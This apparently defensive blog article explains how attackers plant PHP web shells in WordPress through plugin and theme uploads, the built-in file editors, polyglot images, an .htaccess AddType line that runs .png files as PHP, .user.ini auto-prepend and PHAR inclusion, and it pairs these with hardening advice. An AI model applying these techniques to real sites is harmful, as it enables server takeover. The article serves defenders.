How attackers upload web shells in WordPress without plugin or theme

how attackers upload web shells in WordPress

how attackers upload web shells in WordPress: Are WordPress sites really safe if you don’t install shady plugins or themes? Think again. Hackers and even penetration testers have found advanced methods to upload and execute malicious web shells in WordPress without relying on any traditional vulnerabilities. In this guide, we’ll break down how it’s done and what you can do to stop it.

🔍 What Is a Web Shell?

A web shell is a malicious script—usually written in PHP—that allows attackers to remotely control a server via the web. In WordPress, running a web shell typically requires uploading and executing a PHP file. But surprisingly, attackers can do this without exploiting any plugin or theme vulnerability, relying only on WordPress’ core features and typical server configurations.

🛠️ Common Methods Hackers Use to Deploy Web Shells in WordPress

Here are the most common attack vectors used by hackers or pentesters with admin access:

1. Uploading a ZIP Plugin via the Dashboard

  • Attackers create a ZIP file containing shell.php and a simple plugin.php that includes it.
  • They upload and activate the plugin directly.
  • Protection Tip: Add this line in wp-config.php: phpCopyEditdefine('DISALLOW_FILE_MODS', true); This disables plugin uploads and updates from the dashboard.

2. Uploading a Malicious Theme

  • The shell code is injected into functions.php or another theme file.
  • The attacker uploads the theme and optionally activates it.
  • Protection Tip: Same as above, plus use a WAF (Web Application Firewall) to monitor file changes.

3. Theme File Editor Exploitation

  • Attackers use the Theme Editor to add malicious code directly into functions.php or create a new shell.php.
  • Protection Tip: Disable file editing via wp-config: phpCopyEditdefine('DISALLOW_FILE_EDIT', true);

4. Plugin File Editor Abuse

  • Similar to the theme editor, but targets active plugins.
  • The attacker injects malicious PHP into plugin files.
  • Protection Tip: Use the same DISALLOW_FILE_EDIT constant and perform regular file integrity scans.

5. Upload via Media Library + .htaccess Trick

  • Uploads a polyglot file (an image file containing embedded PHP code).
  • Also uploads a .htaccess file to force Apache to treat .png or .jpg as PHP.
  • Protection Tip:
    • Block .htaccess overrides in the uploads/ folder.
    • Prevent PHP execution in uploads via: sqlCopyEdit<FilesMatch "\.php$"> Deny from all </FilesMatch>

6. Exploiting REST API + Application Passwords

  • Uses WordPress REST API along with admin credentials or app passwords to upload and activate malicious code, bypassing the dashboard entirely.

🔧 Advanced Web Shell Techniques

Even without admin panel access, attackers may use more sophisticated methods:

Polyglot Files via Media Library

  • Combines a 1×1.png with payload.txt (containing PHP).
  • Renames the merged file as polyglot.png.
  • Some servers also execute .php5, .phtml, or similar extensions.

MIME Type Exploitation with .htaccess

  • Uploads .htaccess with: bashCopyEditAddType application/x-httpd-php .png
  • Now, a .png file with embedded PHP executes like a regular script.

PNG/PHAR Polyglot Exploits

  • Injects PHP into image metadata using tools like exiftool or manual bash commands.
  • PHAR archives are combined with images and can be executed via LFI (Local File Inclusion).

Bypassing .htaccess Restrictions

  • Injects payloads into log files or finds vulnerable include() calls in themes or plugins.
  • Uses mu-plugins folder which autoloads PHP if attacker can upload there.
  • Abuse of .user.ini with auto_prepend_file to force execution of shell across pages.

🚫 Shell Execution Without File Uploads

Even if file uploads are completely blocked, attackers may:

  • Inject PHP payloads into site settings or use REST API to schedule tasks via WP-Cron.
  • Look for any writable path or LFI to include shell payloads.

🧪 Types of PHP Web Shells by Execution Method

  • System shell: Uses system(), exec(), or shell_exec() to run OS commands.
  • Eval/assert shells: Executes arbitrary PHP received through POST requests.
  • Include shells: Loads external files, often encrypted or obfuscated.
  • PHAR/deserialization: Loads malicious PHAR via include() in vulnerable code.
  • Auto-prepend shell: Executes on every page load using .htaccess or .user.ini.
  • GUI shells: Full web-based control panels like WSO, b374k, R57.

🛡️ Summary & Best Security Practices

To defend against these attacks:

  1. Disable all file uploads and edits via dashboard: phpCopyEditdefine('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true);
  2. Prevent PHP execution in wp-content/uploads/.
  3. Monitor for file changes and use integrity scanning tools.
  4. Use a strong WAF, secure wp-config.php, and restrict admin access.
  5. Audit server configurations — not just WordPress!

Related Posts

error: Content is protected !!
Scroll to Top